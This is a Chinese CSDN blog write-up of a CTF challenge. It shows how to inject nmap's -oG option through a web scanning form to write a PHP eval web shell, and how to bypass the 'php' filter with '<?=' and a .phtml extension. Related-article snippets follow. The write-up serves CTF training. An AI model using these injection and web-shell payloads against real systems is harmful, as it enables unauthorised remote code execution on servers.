web buuctf [网鼎杯 2020 朱雀组]Nmap1

最新推荐文章于 2024-04-01 20:44:04 发布
最新推荐文章于 2024-04-01 20:44:04 发布
阅读量1.6k 收藏
点赞数
文章标签: nmap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44214568/article/details/123970176
版权

考点:namp注入

参考web buuctf [BUUCTF 2018]Online Tool1_半杯雨水敬过客的博客-CSDN博客

1.

 2.利用NMAP里的-oG命令实现代码的写入,那我们这里就可以尝试构造payload,来利用‘拼接,写入我们想要的shell文件

我们直接用那道buu里的payload:

' <?php eval($_POST["cmd"]);?> -oG zhuque.php '

注入之后发现存在过滤,fuzz,过滤了php

(1)利用<?=来代替<?php进行绕过
(2)利用phtml来代替shell.php的文件后缀

payload:

' <?= eval($_POST["cmd"]);?> -oG zhuque.phtml '

 上传成功

3.打开蚁剑

 在根目录下找到flag

 flag{fb8e3637-ac42-456c-8caf-d1470e670fe5}

半杯雨水敬过客
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网鼎杯青龙18道.rar
06-11
【标题】"网鼎杯青龙18道.rar"是一个关于网络安全竞赛的资源压缩包,其中包含了2020网鼎杯青龙的比赛题目。网鼎杯是一项知名的网络安全技术竞赛,旨在提升参赛者的网络安全技能和实战能力,尤其针对青龙,...
WebMap:WebMap-Nmap Web 仪表板和报告
05-30
Nmap XML 报告的 Web 仪表板 目录 截屏 用法 您应该将它与 docker 一起使用,只需发送以下命令: $ mkdir /tmp/webmap $ docker run -d \ --name webmap \ -h webmap \ -p 8000:8000 \ -v /tmp/webmap:/opt/...
[网鼎杯 2020 朱雀]Nmap1
m0_75178803的博客
04-01 971
打开题目在源代码中看到了提示先随便输入127.0.0.1那我们试试输入可以看到 | 被转义符号\所转义那我们输入 127.0.0.1 /| ls得到三条反斜线我们猜测,我们输入的东西是被escapeshellarg和escapeshellcmd处理过后的结果我们输入的东西必须绕过这两个函数。
[网鼎杯 2020 朱雀]Nmap 1两种解法
weixin_53150482的博客
07-19 410
[网鼎杯 2020 朱雀]Nmap 1两种解法
BUUCTF Web [网鼎杯 2020 朱雀]Nmap1
网安小趴菜
11-16 666
BUUCTF Web [网鼎杯 2020 朱雀]Nmap wp1
[网鼎杯 2020 朱雀]Nmap 1
plant1234的博客
04-15 2334
[网鼎杯 2020 朱雀]Nmap 1 首先得到题目打开得到 说是输入houst和IP进行扫描 测试一波:127.0.0.1 得到: 本地测一下nmap 命令得到: 发现效果一样 这里需要知道 nmap 命令将扫描结果保存在文件里面: 例如:将nmap 127.0.0.1的结果保存在test.txt里面 nmap 127.0.0.1 -oN test.txt nmap其他写文件命令: -oN (标准输出) -oX (XML输出) -oS (ScRipT KIdd|3 oUTpuT) -oG (G
[网鼎杯 2020 朱雀]Nmap wp
qq_64201116的博客
08-24 804
2020朱雀杯]和的题目似乎是一样的,不同在于朱雀杯没有给出源码,主要考察的都是nmap一句话木马写入。本篇文章细致讲解输入时和两个函数所进行的步骤。
2020-网鼎杯-朱雀-Web-nmap
feng的博客
11-03 810
WP 和BUUCTF里的2018 Online Tool非常类似。 首先就是中是个nmap命令注入,有2个方式: 利用-oG,可以将命令和结果写进文件。 利用-iL 和-oN。其中-iL是从inputfilename文件中读取扫描的目标。在这个文件中要有一个主机或者网络的列表,由空格键、制表键或者回车键作为分割符。如果使用-iL-,nmap就会从标准输入stdin读取主机名字。你可以从指定目标一节得到更加详细的信息,-oN是把扫描结果重定向到一个可读的文件logfilename中。 关于escapesh
[网鼎杯 2020 朱雀]Nmap(双解详细分析)
记录学习,一起进步
01-29 1055
[网鼎杯 2020 朱雀]Nmap
2020网鼎杯_朱雀_Web_nmap
m0_52199518的博客
04-06 421
WP 两个考察点 1.考察nmap的使用 2.考察escapeshellarg()与escapeshellcmd()混合使用的漏洞 第一个还好说,题目告诉了 第二个点嘛,不知道,完全不知道是从哪里获取到的,自闭ing 看其他师傅的wp,提到了[BUUCTF 2018]Online Tool,一道代码审计题,直接告诉了参数经过escapeshellarg()与escapeshellcmd()处理 两道题考察的点不能说一样,只能说完全一致。 nmap要用输出相关的参数 在nmap中文网里查阅能有以下结果: -o
[WP/WEB安全/命令注入]由[网鼎杯 2020 朱雀]Nmap-总结在线工具注入
車鈊的博客
06-06 426
在线工具注入总结 此道可理解为一种命令注入,凡是依托eval或者提交语句完成的命令执行,如果应用对用户可控的语句信任度过高的话,都会产生注入,这可以作为一些渗透的解题思路。 [网鼎杯2020朱雀]NMAP 源码 做题中读取到的源码 <?php require('settings.php'); set_time_limit(0); if (isset($_POST['host'])): if (!defined('WEB_SCANS')) { die('Web scans dis
Web应用安全:Nmap扫描原理与用法.docx
06-18
1、Nmap的优点 灵活。支持数十种不同的扫描方式,支持多种目标对象的扫描。 强大。Nmap可以用于扫描互联网上大规模的计算机。 可移植。支持主流操作系统:Windows/Linux/Unix/MacOS等等;源码开放,方便移植。 简单...
用mimiktz和nmap进行网络扫描
06-15
《mimiktz和nmap在网络扫描中的应用》 网络安全是一项至关重要的任务,尤其是在现代数字化社会中。本文将深入探讨如何使用mimiktz和nmap这两种强大的工具来进行网络扫描,以获取目标主机的登录账号信息,并通过不同...
Web应用安全:Nmap全连接扫描.pptx
06-18
**TCP连接的三次握手** 在理解Nmap全连接扫描之前,我们需要先了解TCP连接...通过理解TCP的三次握手和Nmap的全连接扫描,我们可以更有效地进行Web应用安全检查,发现潜在的漏洞和风险,从而采取措施加强网络安全防护。
守望先锋资讯小程序(源码).zip
07-28
守望先锋资讯小程序(源码).zip
无人智能化关键技术及其在火炮系统中的应用_常建龙.caj
最新发布
07-28
无人智能化关键技术及其在火炮系统中的应用_常建龙
本科设计-机器学习识别图片验证码-可执行内含文档代码-可执行内含文档代码.zip
07-28
本科设计-机器学习识别图片验证码-可执行内含文档代码-可执行内含文档代码.zip
【2023】智能网联汽车数据安全合规白皮书-路特斯科技&普华永道_43页.pdf
07-28
【2023】智能网联汽车数据安全合规白皮书-路特斯科技&普华永道_43页.pdf
[网鼎杯 2020 朱雀]nmap
03-16
nmap是一款网络扫描工具,可以用来扫描目标主机的开放端口、操作系统类型、服务版本等信息。它可以帮助安全人员评估网络安全状况,发现潜在的漏洞和攻击面。同时,nmap也可以用来管理网络,例如发现新设备、检查网络...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值